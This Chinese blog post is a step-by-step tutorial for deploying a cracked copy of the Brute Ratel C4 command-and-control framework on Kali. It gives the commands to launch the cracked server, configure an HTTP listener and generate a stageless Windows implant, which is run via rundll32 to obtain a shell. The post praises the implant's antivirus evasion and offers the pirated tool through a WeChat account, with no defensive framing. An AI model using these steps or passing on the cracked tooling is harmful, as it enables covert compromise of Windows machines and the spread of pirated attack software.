在前面的文章中,我们提到过很多C2框架工具。如CS viper等。今天为大家分享另外一款好玩的工具Brute Ratel C4

部署

下载完成后,在kali中解压文件。

安装环境和证书(可省略)

进入adhoc_scripts目录下运行,安装环境和生成证书

chmod +x install.sh
chmod +x genssl.sh
./install.sh
./genssl.sh

安装环境

生成证书

接下来,分别给brute-ratel-linx64_crack以及lib64/commander执行权限

chmod +x brute-ratel-linx64_crack
chmod +x lib64/commander

接下来,启动服务端

./brute-ratel-linx64_crack -ratel -a admin -p password -h 127.0.0.1:50000 -sc cert.pem -sk key.pem

执行完后将生成的key.pemcert.pem复制到工具的目录下

参数说明:

  • -a 用户名
  • -p 登录密码

接下来,我们启动客户端

chmod +x Rungui.sh #给客户端添加权限
./Rungui.sh


修改你的端口和账号密码等信息。完成后点击头像登录。

添加监听

和cs等工具一样,接下来我们新建一个监听。点击C4 Profiler -> Add http Listener

添加监听
参数配置示例如下:


注意: sleepjitter类似于cs的延时时间,可调低,末尾最后一行勾选后,马子如果一次不上线,不会一直请求

生成shell

点击save保存,即可得到一个监听器,右键此监听器,选择Stageless,即可生成对应架构的马子

但不知为何,作者生成exe文件后,在Windows11系统上得不到Shell。无奈生成了dll文件。

rundll32 kali.dll,main

运行后,成功上线!
当前,免杀效果还是挺好的。

相关操作

命令终端

文件浏览

当然,还有很多好玩的功能。我们会在后期的文章中为大家更新!

总结

优点: 免杀非常友好,和cs等工具相似,入手门槛低。

不足: 目前仅支持Windows Payload。 希望在后面能增加其他平台的Payload。

获取工具,关注微信公众号kali笔记后台回复( C4

版权属于:逍遥子大表哥

本文链接:https://blog.bbskali.cn/4290.html

按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。

最后修改:2024 年 07 月 04 日
© 允许规范转载
可怜可怜吧!正在沿街乞讨~